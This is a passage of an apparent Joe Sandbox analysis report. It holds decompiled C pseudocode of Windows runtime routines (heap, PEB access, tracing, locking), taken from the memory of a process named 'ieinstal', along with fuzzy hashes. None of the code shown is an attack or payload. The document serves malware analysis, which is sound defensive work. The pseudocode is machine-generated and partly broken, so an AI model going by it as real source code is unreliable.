                        										E1ED09240(_t68, _t82, _t82, _t84, __eflags);
                        									}
                        								} else {
                        									_t79 = 0x1edf86c4;
                        									_t72 = 0x1edf86c0;
                        									L18:
                        									E1ED39B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                        								}
                        							}
                        							goto L5;
                        						}
                        					}
                        				}
                        			}


















                        Similarity
                        • Opcode ID: 52503793424954a3b5901ee08278c01a12fc6bf998533aa9f7e4348f355be3ec
                        • Instruction ID: ca276bbdae353511f244c0467475898a57b0508cd0e463fc486e60ac4b2516ab
                        • Opcode Fuzzy Hash: 52503793424954a3b5901ee08278c01a12fc6bf998533aa9f7e4348f355be3ec
                        • Instruction Fuzzy Hash: 3B319E78B05685DFDB11CB69C598B8DBBB2BF89314F5D8759C4096B2C1C330E984CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E1ED20050(void* __ecx) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				signed int _t34;
                        				void* _t40;
                        				void* _t41;
                        				signed int _t44;
                        				intOrPtr _t47;
                        				signed int _t58;
                        				void* _t59;
                        				void* _t61;
                        				void* _t62;
                        				signed int _t64;
                        
                        				_push(__ecx);
                        				_v8 =  *0x1edfd360 ^ _t64;
                        				_t61 = __ecx;
                        				_t2 = _t61 + 0x20; // 0x20
                        				E1ED39ED0(_t2, 1, 0);
                        				_t52 =  *(_t61 + 0x8c);
                        				_t4 = _t61 + 0x8c; // 0x8c
                        				_t40 = _t4;
                        				do {
                        					_t44 = _t52;
                        					_t58 = _t52 & 0x00000001;
                        					_t24 = _t44;
                        					asm("lock cmpxchg [ebx], edx");
                        					_t52 = _t44;
                        				} while (_t52 != _t44);
                        				if(_t58 == 0) {
                        					L7:
                        					_pop(_t59);
                        					_pop(_t62);
                        					_pop(_t41);
                        					return E1ED4B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                        				}
                        				asm("lock xadd [esi], eax");
                        				_t47 =  *[fs:0x18];
                        				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                        				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t30 != 0) {
                        					if( *_t30 == 0) {
                        						goto L4;
                        					}
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					L5:
                        					if( *_t31 != 0) {
                        						_t18 = _t61 + 0x78; // 0x78
                        						E1EDD8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                        					}
                        					_t52 =  *(_t61 + 0x5c);
                        					_t11 = _t61 + 0x78; // 0x78
                        					_t34 = E1ED39702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                        					_t24 = _t34 | 0xffffffff;
                        					asm("lock xadd [esi], eax");
                        					if((_t34 | 0xffffffff) == 0) {
                        						 *0x1edfb1e0(_t61);
                        						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                        					}
                        					goto L7;
                        				}
                        				L4:
                        				_t31 = 0x7ffe0386;
                        				goto L5;
                        			}




















                        Similarity
                        • Opcode ID: 25b121cf1183b5d8180ed4cd8bad50167f3e1ebf42c3b3e170d73061c5f91178
                        • Instruction ID: e99376d61489d348ef3f5f61a4374b16305d56f2571f9f8e56977dc10d35330c
                        • Opcode Fuzzy Hash: 25b121cf1183b5d8180ed4cd8bad50167f3e1ebf42c3b3e170d73061c5f91178
                        • Instruction Fuzzy Hash: BC31AE31601B45CFD721CB28C940B8AB3E6FF88714F244A6DE49A8BB90DB31E801CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E1ED86C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                        				signed short* _v8;
                        				signed char _v12;
                        				void* _t22;
                        				signed char* _t23;
                        				intOrPtr _t24;
                        				signed short* _t44;
                        				void* _t47;
                        				signed char* _t56;
                        				signed char* _t58;
                        
                        				_t48 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t44 = __ecx;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t22 = E1ED27D50();
                        				_t58 = 0x7ffe0384;
                        				if(_t22 == 0) {
                        					_t23 = 0x7ffe0384;
                        				} else {
                        					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				}
                        				if( *_t23 != 0) {
                        					_t24 =  *0x1edf7b9c; // 0x0
                        					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                        					_t23 = L1ED24620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                        					_t56 = _t23;
                        					if(_t56 != 0) {
                        						_t56[0x24] = _a4;
                        						_t56[0x28] = _a8;
                        						_t56[6] = 0x1420;
                        						_t56[0x20] = _v12;
                        						_t14 =  &(_t56[0x2c]); // 0x2c
                        						E1ED4F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                        						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                        						if(E1ED27D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						}
                        						_push(_t56);
                        						_push(_t47 - 0x20);
                        						_push(0x402);
                        						_push( *_t58 & 0x000000ff);
                        						E1ED49AE0();
                        						_t23 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                        					}
                        				}
                        				return _t23;
                        			}












                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0b56a2ba44d9117670555a9e3d35f1d186983cf374e611a63faeb0e7debb7fa
                        • Instruction ID: 0f972c779827fd7090cf15c32cb179d25b2fc44baaa4842393d692181eb3396d
                        • Opcode Fuzzy Hash: a0b56a2ba44d9117670555a9e3d35f1d186983cf374e611a63faeb0e7debb7fa
                        • Instruction Fuzzy Hash: 0621A9B5A00684AFC711CB68D980F6AB7B8FF48714F1002A9F908CBB90D735ED50CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E1ED490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                        				intOrPtr* _v0;
                        				void* _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				char _v36;
                        				void* _t38;
                        				intOrPtr _t41;
                        				void* _t44;
                        				signed int _t45;
                        				intOrPtr* _t49;
                        				signed int _t57;
                        				signed int _t58;
                        				intOrPtr* _t59;
                        				void* _t62;
                        				void* _t63;
                        				void* _t65;
                        				void* _t66;
                        				signed int _t69;
                        				intOrPtr* _t70;
                        				void* _t71;
                        				intOrPtr* _t72;
                        				intOrPtr* _t73;
                        				char _t74;
                        
                        				_t65 = __edx;
                        				_t57 = _a4;
                        				_t32 = __ecx;
                        				_v8 = __edx;
                        				_t3 = _t32 + 0x14c; // 0x14c
                        				_t70 = _t3;
                        				_v16 = __ecx;
                        				_t72 =  *_t70;
                        				while(_t72 != _t70) {
                        					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                        						L24:
                        						_t72 =  *_t72;
                        						continue;
                        					}
                        					_t30 = _t72 + 0x10; // 0x10
                        					if(E1ED5D4F0(_t30, _t65, _t57) == _t57) {
                        						return 0xb7;
                        					}
                        					_t65 = _v8;
                        					goto L24;
                        				}
                        				_t61 = _t57;
                        				_push( &_v12);
                        				_t66 = 0x10;
                        				if(E1ED3E5E0(_t57, _t66) < 0) {
                        					return 0x216;
                        				}
                        				_t73 = L1ED24620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                        				if(_t73 == 0) {
                        					_t38 = 0xe;
                        					return _t38;
                        				}
                        				_t9 = _t73 + 0x10; // 0x10
                        				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                        				E1ED4F3E0(_t9, _v8, _t57);
                        				_t41 =  *_t70;
                        				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                        					_t62 = 3;
                        					asm("int 0x29");
                        					_push(_t62);
                        					_push(_t57);
                        					_push(_t73);
                        					_push(_t70);
                        					_t71 = _t62;
                        					_t74 = 0;
                        					_v36 = 0;
                        					_t63 = E1ED3A2F0(_t62, _t71, 1, 6,  &_v36);
                        					if(_t63 == 0) {
                        						L20:
                        						_t44 = 0x57;
                        						return _t44;
                        					}
                        					_t45 = _v12;
                        					_t58 = 0x1c;
                        					if(_t45 < _t58) {
                        						goto L20;
                        					}
                        					_t69 = _t45 / _t58;
                        					if(_t69 == 0) {
                        						L19:
                        						return 0xe8;
                        					}
                        					_t59 = _v0;
                        					do {
                        						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                        							goto L18;
                        						}
                        						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                        						 *_t59 = _t49;
                        						if( *_t49 != 0x53445352) {
                        							goto L18;
                        						}
                        						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                        						return 0;
                        						L18:
                        						_t63 = _t63 + 0x1c;
                        						_t74 = _t74 + 1;
                        					} while (_t74 < _t69);
                        					goto L19;
                        				}
                        				 *_t73 = _t41;
                        				 *((intOrPtr*)(_t73 + 4)) = _t70;
                        				 *((intOrPtr*)(_t41 + 4)) = _t73;
                        				 *_t70 = _t73;
                        				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                        				return 0;
                        			}


























                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 71c45f9b073fd7b188e2904a4a64d5e5a489e8b826263f51a3a39265a67bee61
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: F32195B5A00746EFD720CF5AC444E9AF7F8EF54310F258A6AE985A7690D330ED44CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E1ED33B7A(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v20;
                        				intOrPtr _t17;
                        				intOrPtr _t26;
                        				void* _t35;
                        				void* _t38;
                        				void* _t41;
                        				intOrPtr _t44;
                        
                        				_t17 =  *0x1edf84c4; // 0x0
                        				_v12 = 1;
                        				_v8 =  *0x1edf84c0 * 0x4c;
                        				_t41 = __ecx;
                        				_t35 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x1edf84c0 * 0x4c);
                        				if(_t35 == 0) {
                        					_t44 = 0xc0000017;
                        				} else {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t35);
                        					_push(4);
                        					_push( &_v12);
                        					_push(0x6b);
                        					_t44 = E1ED4AA90();
                        					_v20 = _t44;
                        					if(_t44 >= 0) {
                        						E1ED4FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x1edf84c0 * 0xc);
                        						_t38 = _t35;
                        						if(_t35 < _v8 + _t35) {
                        							do {
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                        							} while (_t38 < _v8 + _t35);
                        							_t44 = _v20;
                        						}
                        					}
                        					_t26 =  *0x1edf84c4; // 0x0
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                        				}
                        				return _t44;
                        			}












                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04f28b58764c34f02c721049c0fbd9c7bf72a88d2f95260318d66451e11ee025
                        • Instruction ID: afea5f68c24b92faa3fbe6374beb330750525407735de46f35327d7fbc83f173
                        • Opcode Fuzzy Hash: 04f28b58764c34f02c721049c0fbd9c7bf72a88d2f95260318d66451e11ee025
                        • Instruction Fuzzy Hash: B22192B2A00114AFDB04CF58CE92B5AB7BDFF44708F250678E905AB251D771ED02CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E1ED86CF0(void* __edx, intOrPtr _a4, short _a8) {
                        				char _v8;
                        				char _v12;
                        				char _v16;
                        				char _v20;
                        				char _v28;
                        				char _v36;
                        				char _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char* _t21;
                        				void* _t24;
                        				void* _t36;
                        				void* _t38;
                        				void* _t46;
                        
                        				_push(_t36);
                        				_t46 = __edx;
                        				_v12 = 0;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(E1ED27D50() == 0) {
                        					_t21 = 0x7ffe0384;
                        				} else {
                        					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                        				}
                        				if( *_t21 != 0) {
                        					_t21 =  *[fs:0x30];
                        					if((_t21[0x240] & 0x00000004) != 0) {
                        						if(E1ED27D50() == 0) {
                        							_t21 = 0x7ffe0385;
                        						} else {
                        							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t21 & 0x00000020) != 0) {
                        							_t56 = _t46;
                        							if(_t46 == 0) {
                        								_t46 = 0x1ece5c80;
                        							}
                        							_push(_t46);
                        							_push( &_v12);
                        							_t24 = E1ED3F6E0(_t36, 0, _t46, _t56);
                        							_push(_a4);
                        							_t38 = _t24;
                        							_push( &_v28);
                        							_t21 = E1ED3F6E0(_t38, 0, _t46, _t56);
                        							if(_t38 != 0) {
                        								if(_t21 != 0) {
                        									E1ED87016(_a8, 0, 0, 0,  &_v36,  &_v28);
                        									L1ED22400( &_v52);
                        								}
                        								_t21 = L1ED22400( &_v28);
                        							}
                        						}
                        					}
                        				}
                        				return _t21;
                        			}



















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ee100925d7b8552d17dd49a5231b5d4a63c0373f31c0c8967ba1f24bf71bce6
                        • Instruction ID: f575715fce160602704ba35a480441aa347a72f38b5ca5cec6a19400e2e581c0
                        • Opcode Fuzzy Hash: 6ee100925d7b8552d17dd49a5231b5d4a63c0373f31c0c8967ba1f24bf71bce6
                        • Instruction Fuzzy Hash: D9212272800385AFC301CF65C950F9BB7EDAF81760F010A66F990C72A0E734EA09C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E1EDD070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				char _v8;
                        				intOrPtr _v11;
                        				signed int _v12;
                        				intOrPtr _v15;
                        				signed int _v16;
                        				intOrPtr _v28;
                        				void* __ebx;
                        				char* _t32;
                        				signed int* _t38;
                        				signed int _t60;
                        
                        				_t38 = __ecx;
                        				_v16 = __edx;
                        				_t60 = E1EDD07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                        				if(_t60 != 0) {
                        					_t7 = _t38 + 0x38; // 0x29cd5903
                        					_push( *_t7);
                        					_t9 = _t38 + 0x34; // 0x6adeeb00
                        					_push( *_t9);
                        					_v12 = _a8 << 0xc;
                        					_t11 = _t38 + 4; // 0x5de58b5b
                        					_push(0x4000);
                        					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                        					E1EDCAFDE( &_v8,  &_v12);
                        					E1EDD1293(_t38, _v28, _t60);
                        					if(E1ED27D50() == 0) {
                        						_t32 = 0x7ffe0380;
                        					} else {
                        						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						_t21 = _t38 + 0x3c; // 0xc3595e5f
                        						E1EDC14FB(_t38,  *_t21, _v11, _v15, 0xd);
                        					}
                        				}
                        				return  ~_t60;
                        			}













                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: 214df6ab1df4ad0a3dd59296d48c8b0909b3d8187d6059a8bd3f18ffb34f8baa
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: 7721B336604344AFD705CF28C890B6A7BA6FBC4790F048669F9959B3C5D730E909CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E1ED2AE73(intOrPtr __ecx, void* __edx) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				char* _t22;
                        				signed char* _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t27;
                        				void* _t31;
                        				intOrPtr _t36;
                        				char* _t38;
                        				signed char* _t42;
                        
                        				_push(__ecx);
                        				_t31 = __edx;
                        				_v8 = __ecx;
                        				_t19 = E1ED27D50();
                        				_t38 = 0x7ffe0384;
                        				if(_t19 != 0) {
                        					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t22 = 0x7ffe0384;
                        				}
                        				_t42 = 0x7ffe0385;
                        				if( *_t22 != 0) {
                        					if(E1ED27D50() == 0) {
                        						_t24 = 0x7ffe0385;
                        					} else {
                        						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t24 & 0x00000010) != 0) {
                        						goto L17;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					_t27 = E1ED27D50();
                        					if(_t27 != 0) {
                        						_t27 =  *[fs:0x30];
                        						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                        					}
                        					if( *_t38 != 0) {
                        						_t27 =  *[fs:0x30];
                        						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						_t27 = E1ED27D50();
                        						if(_t27 != 0) {
                        							_t27 =  *[fs:0x30];
                        							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                        						}
                        						if(( *_t42 & 0x00000020) != 0) {
                        							L17:
                        							_t25 = _v8;
                        							_t36 = 0;
                        							if(_t25 != 0) {
                        								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                        							}
                        							_t27 = E1ED87794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                        						}
                        						goto L5;
                        					} else {
                        						L5:
                        						return _t27;
                        					}
                        				}
                        			}













                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: 965c37bcf574608dd26f859e4c3dc8d64e624f2390656e9568e49491b1cc7db7
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: B52101B1A056C2CFD7128B25C944B1937EAFF40B48F5A06B2DC048B6A2E778EC41C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E1ED87794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t21;
                        				void* _t24;
                        				intOrPtr _t25;
                        				void* _t36;
                        				short _t39;
                        				signed char* _t42;
                        				unsigned int _t46;
                        				void* _t50;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t21 =  *0x1edf7b9c; // 0x0
                        				_t46 = _a8;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t4 = _t46 + 0x2e; // 0x2e
                        				_t36 = _t4;
                        				_t24 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                        				_t50 = _t24;
                        				if(_t50 != 0) {
                        					_t25 = _a4;
                        					if(_t25 == 5) {
                        						L3:
                        						_t39 = 0x14b1;
                        					} else {
                        						_t39 = 0x14b0;
                        						if(_t25 == 6) {
                        							goto L3;
                        						}
                        					}
                        					 *((short*)(_t50 + 6)) = _t39;
                        					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                        					_t11 = _t50 + 0x2c; // 0x2c
                        					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                        					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                        					E1ED4F3E0(_t11, _a12, _t46);
                        					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                        					if(E1ED27D50() == 0) {
                        						_t42 = 0x7ffe0384;
                        					} else {
                        						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t50);
                        					_t19 = _t36 - 0x20; // 0xe
                        					_push(0x403);
                        					_push( *_t42 & 0x000000ff);
                        					E1ED49AE0();
                        					_t24 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                        				}
                        				return _t24;
                        			}














                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29fc5e78a8fde15e97c5e0adb716301ed99bc2b381b74231c5c215f274a5f011
                        • Instruction ID: d4fd59e10dcb46bd18d50622579683f802400f5b11e1c240afbb26e039c90b50
                        • Opcode Fuzzy Hash: 29fc5e78a8fde15e97c5e0adb716301ed99bc2b381b74231c5c215f274a5f011
                        • Instruction Fuzzy Hash: 76219D76900644ABC725CF69DC90E9BB7B9EF48740F110669E90ACBB90D734E910CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E1ED3FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				intOrPtr _t29;
                        				intOrPtr _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t40;
                        
                        				_t35 = __edx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t37 = 0;
                        				_v8 = __edx;
                        				_t29 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                        					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                        					L3:
                        					_t19 = _a4 - 4;
                        					if(_t19 != 0) {
                        						if(_t19 != 1) {
                        							L7:
                        							return _t37;
                        						}
                        						if(_t35 == 0) {
                        							L11:
                        							_t37 = 0xc000000d;
                        							goto L7;
                        						}
                        						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                        							_t35 = _v8;
                        						}
                        						 *((intOrPtr*)(_t40 + 4)) = _t35;
                        						goto L7;
                        					}
                        					if(_t29 == 0) {
                        						goto L11;
                        					}
                        					_t32 =  *_t40;
                        					if(_t32 != 0) {
                        						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                        						E1ED176E2( *_t40);
                        					}
                        					 *_t40 = _t29;
                        					goto L7;
                        				}
                        				_t40 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                        				if(_t40 == 0) {
                        					_t37 = 0xc0000017;
                        					goto L7;
                        				}
                        				_t35 = _v8;
                        				 *_t40 = 0;
                        				 *((intOrPtr*)(_t40 + 4)) = 0;
                        				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                        				goto L3;
                        			}











                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: 6aaf4e9042f635dfe9a7514426f6650877c152cee5bac21baafe5cb2707b576b
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: 1421B0B2600689DFC324CF4AD544E96B7E6EB94A12F2186BEE88497714D734EC40CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E1ED09240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t41;
                        				intOrPtr* _t46;
                        				void* _t48;
                        				intOrPtr _t50;
                        				intOrPtr* _t60;
                        				void* _t61;
                        				intOrPtr _t62;
                        				intOrPtr _t65;
                        				void* _t66;
                        				void* _t68;
                        
                        				_push(0xc);
                        				_push(0x1eddf708);
                        				E1ED5D08C(__ebx, __edi, __esi);
                        				_t65 = __ecx;
                        				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                        				if( *(__ecx + 0x24) != 0) {
                        					_push( *(__ecx + 0x24));
                        					E1ED495D0();
                        					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                        				}
                        				L6();
                        				L6();
                        				_push( *((intOrPtr*)(_t65 + 0x28)));
                        				E1ED495D0();
                        				_t33 =  *0x1edf84c4; // 0x0
                        				L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                        				_t37 =  *0x1edf84c4; // 0x0
                        				L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                        				_t41 =  *0x1edf84c4; // 0x0
                        				E1ED22280(L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x1edf86b4);
                        				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                        				_t46 = _t65 + 0xe8;
                        				_t62 =  *_t46;
                        				_t60 =  *((intOrPtr*)(_t46 + 4));
                        				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                        					_t61 = 3;
                        					asm("int 0x29");
                        					_push(_t65);
                        					_t66 = _t61;
                        					_t23 = _t66 + 0x14; // 0x8df8084c
                        					_push( *_t23);
                        					E1ED495D0();
                        					_t24 = _t66 + 0x10; // 0x89e04d8b
                        					_push( *_t24);
                        					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                        					_t48 = E1ED495D0();
                        					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                        					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                        					return _t48;
                        				} else {
                        					 *_t60 = _t62;
                        					 *((intOrPtr*)(_t62 + 4)) = _t60;
                        					 *(_t68 - 4) = 0xfffffffe;
                        					E1ED09325();
                        					_t50 =  *0x1edf84c4; // 0x0
